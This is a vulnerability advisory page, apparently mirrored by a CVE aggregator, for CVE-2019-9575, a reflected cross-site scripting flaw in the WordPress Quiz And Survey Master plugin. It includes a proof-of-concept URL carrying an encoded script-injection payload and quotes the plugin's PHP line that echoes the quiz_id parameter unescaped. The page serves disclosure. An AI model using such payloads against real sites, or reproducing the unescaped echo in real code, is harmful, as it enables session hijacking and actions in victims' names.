Lucene search
CVE 0dayCVE0DAY:3A870CE6CE107406EDDC98AB288F738DHistoryMar 07, 2019 - 1:36 p.m.
WordPress Quiz And Survey Master plugin CVE-2019-9575
2019-03-0713:36:54
CVE 0day
www.cve0day.com
92
0.002 Low
EPSS
Percentile
58.7%
Description
The Quiz And Survey Master WordPress plugin is vulnerable to reflected XSS as it echoes the quiz_id parameter without proper encoding.
Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.
POC
http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results&quiz_id='"><img+src%3Dx+onerror%3Dalert(1)>
Code
quiz-master-next/php/admin/admin-results-page.php:
<input type="hidden" name="quiz_id" value="<?php echo $_GET["quiz_id"]; ?>" />
WordPress Quiz And Survey Master plugin CVE-2019-9575最先出现在CVE 0day。
Related
patchstack
patchstack
openvas
openvas
WordPress Quiz And Survey Master Plugin <= 6.0.4 XSS Vulnerability
2022-07-29 00:00:00
cvelist
cvelist
CVE-2019-9575
2019-03-05 21:00:00
cve
cve
CVE-2019-9575
2019-03-05 21:29:00
osv
osv
CVE-2019-9575
2019-03-05 21:29:00
prion
prion
Cross site scripting
2019-03-05 21:29:00
nvd
nvd
CVE-2019-9575
2019-03-05 21:29:00
wpexploit
wpexploit
Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)
2019-02-05 00:00:00
wpvulndb
wpvulndb
Quiz And Survey Master < 6.2.2 - Authenticated Cross-Site Scripting (XSS)
2019-02-05 00:00:00